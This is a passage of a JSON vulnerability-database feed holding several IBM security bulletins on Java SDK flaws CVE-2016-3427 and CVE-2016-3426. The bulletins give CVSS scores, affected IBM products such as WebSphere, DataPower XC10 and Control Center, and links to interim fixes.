["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-09-29T18:04:03", "id": "391849D137C8AE4FB53B4FC5E1B3F8D0BCDD416F030E276A01FE226C2BE1B6BA", "href": "https://www.ibm.com/support/pages/node/279685", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:15", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Versions 6 and 7 that are used by WebSphere DataPower XC10 Appliance. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nWebSphere DataPower XC10 Appliance Version 2.1 \nWebSphere DataPower XC10 Appliance Version 2.5\n\n## Remediation/Fixes\n\nApply an interim fix, according to the table below.** **Interim fixes are associated with the original APAR that is documented in the table. Because these APAR references might be updated to more recent APARs, see the links in the table for the most recent interim fix information. \n \nThis interim fix contains a new default SSL certificate, as the previous default SSL certificate, which was never intended for production use, has an MD5 signature and is no longer compatible with Java. For deployments that have not installed XC10 interim fixes since February 26, 2016, the following applies: installing this interim fix will make it incompatible with any WebSphere Datapower XC10 appliances that are running with an MD5 certificate, including the default SSL certificate that was shipped prior to this interim fix. If the appliance is configured with a custom keystore and certificate with an MD5 signature, it must be replaced prior to upgrading to this interim fix or the 'clear-tls-config' command must be run on the appliance before or after performing the upgrade. Failing to do so will result in the appliance failing to start. Note that changing the active certificate for an appliance collective does require that the cache be reloaded and client truststores must be configured to trust the new certificate. \n \n\n\n_Product_| _Version_| _APAR_| _Link to interim fix_ \n---|---|---|--- \nWebSphere DataPower XC10 Appliance V2.1 on appliance 9235-92X| 2.1| IT15175| Refer to the **Version 2.1** table in[ Recommended fixes for WebSphere DataPower XC10 Appliance](<http://www-01.ibm.com/support/docview.wss?uid=swg27019704>). \nWebSphere DataPower XC10 Appliance V2.1 on appliance 7199-92X| 2.1| IT15175| Refer to the** Version 2.1** table in [Recommended fixes for WebSphere DataPower XC10 Appliance](<http://www-01.ibm.com/support/docview.wss?uid=swg27019704>). \nWebSphere DataPower XC10 Appliance V2.5 on appliance 7199-92X \n| Version 2.5 with SSD drivers ** \nImportant**: See [More Information](<http://www-01.ibm.com/support/docview.wss?uid=swg21682625>) link and follow instructions to determine if you have an old or newer SSD driver on your appliance using the show ssd-version command.| IT15175| Refer to the **Version 2.5** table in [Recommended fixes for WebSphere DataPower XC10 Appliance](<http://www-01.ibm.com/support/docview.wss?uid=swg27019704>). \nWebSphere DataPower XC10 Appliance V2.5 virtual image| 2.5| IT15175| Refer to the** Version 2.5** table in [Recommended fixes for WebSphere DataPower XC10 Appliance](<http://www-01.ibm.com/support/docview.wss?uid=swg27019704>). \n \n## Workarounds and Mitigations\n\nThere is no workaround. The interim fix must be applied to correct the problem.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:37", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere DataPower XC10 Appliance (CVE-2016-3427, CVE-2016-3426)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:37", "id": "C6A6ABECADB0A1B202F572A8F947AF9F8E55FD674DB366EDEFD2EC2DD4BCE5B7", "href": "https://www.ibm.com/support/pages/node/278779", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:50:35", "description": "## Summary\n\nThere is a vulnerability in current releases of the IBM\u00ae SDK, Java\u2122 Technology Edition that affects IBM Tivoli Federated Identity Manager and IBM Tivoli Federated Identity Manager Business Gateway. This issue was disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM Tivoli Federated Identity Manager 6.2 \nIBM Tivoli Federated Identity Manager Business Gateway 6.2| IBM WebSphere Application Server 6.1 \nIBM Tivoli Federated Identity Manager 6.2.1 \nIBM Tivoli Federated Identity Manager Business Gateway 6.2.1| IBM WebSphere Application Server 6.1, 7.0 \nIBM Tivoli Federated Identity Manager 6.2.2 \nIBM Tivoli Federated Identity Manager Business Gateway 6.2.2| IBM WebSphere Application Server 6.1, 7.0, 8.0, 8.5 \n \n## Remediation/Fixes\n\nIBM Tivoli Federated Identity Manager and IBM Tivoli Federated Identity Manager Business Gateway is affected through IBM WebSphere Application Server. If you use one of the affected versions of WebSphere, update your IBM WebSphere Application Server SDK with the appropriate Interim Fix based on information in the WebSphere security bulletin [**Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>).\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T21:41:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in IBM Java SDK affects IBM Tivoli Federated Identity Manager and IBM Tivoli Federated Identity Manager Business Gateway", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-16T21:41:50", "id": "0A188938BB57625255598B9B581375E3C99A86BB3F15E48ED8315B0895EAF89D", "href": "https://www.ibm.com/support/pages/node/278527", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:05", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Records Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the [_Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Records Manager 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \nIBM Records Manager 8.5.0.6| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \nIBM Records Manager 8.5.0.7| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T12:16:04", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Records Manager (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T12:16:04", "id": "CE0E774D280D0A9EA8834062B059FA20181F271D6A07DE4FB444EC479DE07233", "href": "https://www.ibm.com/support/pages/node/282281", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:09", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Records Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin \"[Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>)\" for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Records Manager 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \nIBM Records Manager 8.5.0.6| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \nIBM Records Manager 8.5.0.7| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T12:15:34", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Records Manager (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T12:15:34", "id": "342276C20A5C5FDDDF8726F4B0773A53244224965A0AE1BE83CE2A30F753D938", "href": "https://www.ibm.com/support/pages/node/278705", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:16", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Runtime Environments (JREs), Versions 6, 7, 7R1 shipped with IBM WebSphere Application Server patterns. These issues were disclosed as part of the IBM Java SDK updates in April 2016. \n\n## Vulnerability Details\n\nIf you run your own Java code using the IBM Java Runtime delivered with this product, you should evaluate your code to determine whether the complete list of vulnerabilities are applicable to your code. For a complete list of vulnerabilities, please refer to the Reference section for more information. \n \n \nPlease also consult the security bulletin: \n[Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) \nfor vulnerability details and information about fixes. \n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n** \nCVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n\n## Affected Products and Versions\n\nIBM Java SDK shipped with IBM WebSphere Application Server Patterns 1.0.0.0,1.0.0.1, 1.0.0.2,1.0.0.3,1.0.0.4, 1.0.0.5, 1.0.0.7,1.0.1.0,1.0.2.0 and 2.2.0.0\n\n## Remediation/Fixes\n\n**_IBM WebSphere Application Server Patterns 1.0.0.0_**\n\nApply WebSphere Application Server fixpack 8.5.5.10 when available, in the interim apply[](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+MQ&release=8.0&platform=All&function=aparId&apars=IT13492>) [](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FWebSphere+Application+Server+Patterns&fixids=1.0.0.0-WS-WASPATTERNS-8559&source=SAR>)[ifix 1.0.0.0-WS-WASPATTERNS-APR16](<http://www-933.ibm.com/support/fixcentral/swg/selectFix?product=ibm%2FWebSphere%2FWebSphere+Application+Server+Patterns&fixids=1.0.0.0-WS-WASPATTERNS-APR16&source=SAR&function=fixId&parent=ibm/WebSphere>)\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:36", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities have been identified in IBM Java SDK affecting WebSphere Application Server bundled with IBM WebSphere Application Server Patterns and IBM WebSphere Application Server for Cloud", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:36", "id": "3DF5A1EC8EEA23B1128F84C6374971EA3815E1F8281F849F3593423BB347D925", "href": "https://www.ibm.com/support/pages/node/278675", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:39:17", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 7 that is used by IBM Control Center. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java, SE Java SE Embedded and JRockit related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java SE and Java SE Embedded related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM Control Center 6.1.0.0 through 6.1.0.0 iFix02 \nIBM Control Center 6.0.0.0 through 6.0.0.1 iFix05 \nIBM Sterling Control Center 5.4.2 through 5.4.2.1 iFix08\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **Fix**| **How to acquire fix** \n---|---|---|--- \nControl Center| 6.1.0.0| iFix03| [_Fix Central - 6.1.0.0_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/Sterling+Control+Center&release=6.1.0.0&platform=All&function=all>) \nControl Center| 6.0.0.1| iFix06| [_Fix Central - 6.0.0.1_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/Sterling+Control+Center&release=6.0.0.1&platform=All&function=all>) \nControl Center| 5.4.2.1| iFix09| [_Fix Central - 5.4.2.1_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/Sterling+Control+Center&release=5.4.2.1&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-12-17T22:47:42", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Sterling Control Center (CVE-2016-3427 and CVE-2016-3426)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2019-12-17T22:47:42", "id": "5F3A2E75CBD34F2D760C7DAE0148B354CA04A0288478AD25F8ED498DB635196E", "href": "https://www.ibm.com/support/pages/node/283459", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:13", "description": "## Summary\n\nIBM Java SDK is shipped as a component of WebSphere Application Server Community Edition 3.0.0.4. Information about multiple security vulnerabilities affecting IBM Java SDK has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [_IBM Java SDK security bulletin_](<http://www-01.ibm.com/support/docview.wss?uid=swg21980826>) for vulnerability details and information about fixes. \n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| \nAffected Supporting Product and Version \n---|--- \nWebSphere Application Server Community Edition 3.0.0.4| IBM SDK for Java 6, 7 \n \n## ", "cvss3": {}, "published": "2018-06-15T07:05:37", "type": "ibm", "title": "Security Bulletin: Multiple Security vulnerabilities have been identified in IBM Java SDK shipped with WebSphere Application Server Community Edition(CVE-2016-3427 CVE-2016-3426)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:37", "id": "471FC6DCFC7216154A057D59B759EF42BEB095C5F6F09974870FD1E5968AC39A", "href": "https://www.ibm.com/support/pages/node/279021", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T01:54:17", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Enterprise Service Bus. Information about the security vulnerabilities affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n \nPlease consult the security bulletin [Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nWebSphere Enterprise Service Bus v7.0 and v 7.5\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:34", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere \nApplication Server shipped with WebSphere Enterprise Service Bus (CVE-2016-3427, CVE-2016-3426)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:34", "id": "B4C8559B2D36E25ABE9FBA0A4F587138E22094E71DD07485714AE1D179A84333", "href": "https://www.ibm.com/support/pages/node/278313", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:45:02", "description": "## Summary\n\nOracle released the April 2016 critical patch updates which contain multiple fixes for security vulnerabilities in the IBM Java Development Kit that is included with the IBM WebSphere Application Server.\n\n## Vulnerability Details\n\nNew IBM WebSphere Application Server updates are available that include an updated IBM Java Virtual Machine to solve several security vulnerabilities. IBM Java Virtual Machine has been updated to incorporate those updates. \n \nFor information about how to download and install the IBM WebSphere Application Server April 2016 critical patch updates, see the IBM WebSphere Application Server Security Bulletin at the following link: \n[Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21982223>)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM Integrated Information Core V1.5, V1.5.0.1 and V1.5.0.2| IBM WebSphere Application Server V7.0 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T22:28:33", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Integrated Information Core - Oracle CPU April 2016", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T22:28:33", "id": "2F849754C32CC7E1EC23ADD90E35A80C3A3A4B7890DAD95ADA048C88D062115A", "href": "https://www.ibm.com/support/pages/node/279869", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:43", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology Edition that is shipped with IBM WebSphere Application Server. These issues were disclosed in the Oracle April 2016 Critical Patch Update, plus four additional vulnerabilities. These may affect some configurations of IBM WebSphere Application Server Full Profile, IBM WebSphere Application Server Liberty Profile, and IBM WebSphere Application Server Hypervisor Edition\n\n## Vulnerability Details\n\nThis bulletin covers all applicable Java SE CVEs published by Oracle as part of their April 2016 Critical Patch Update which affects IBM 